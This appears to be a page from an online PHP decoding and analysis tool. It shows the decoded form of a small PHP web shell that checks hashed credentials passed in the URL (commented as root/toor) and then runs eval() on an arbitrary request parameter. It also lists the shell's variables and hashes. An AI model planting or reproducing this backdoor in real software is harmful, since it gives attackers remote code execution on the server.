Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $user="63a9f0ea7bb98050796b649e85481845"; #root $pass="7b24afc8bc80e548d66c4e7ff72..

Decoded Output download

<?php 
$user="63a9f0ea7bb98050796b649e85481845"; #root 
$pass="7b24afc8bc80e548d66c4e7ff72171c5"; #toor 
 
if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass) 
{eval($_GET['idc']);} 
?> 

Did this file decode correctly?

Original Code

<?php
$user="63a9f0ea7bb98050796b649e85481845"; #root
$pass="7b24afc8bc80e548d66c4e7ff72171c5"; #toor

if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)
{eval($_GET['idc']);}
?>

Function Calls

md5 2

Variables

$pass 7b24afc8bc80e548d66c4e7ff72171c5
$user 63a9f0ea7bb98050796b649e85481845

Stats

MD5 9df7b6c3aea6c3a421781d720c5421f9
Eval Count 0
Decode Time 104 ms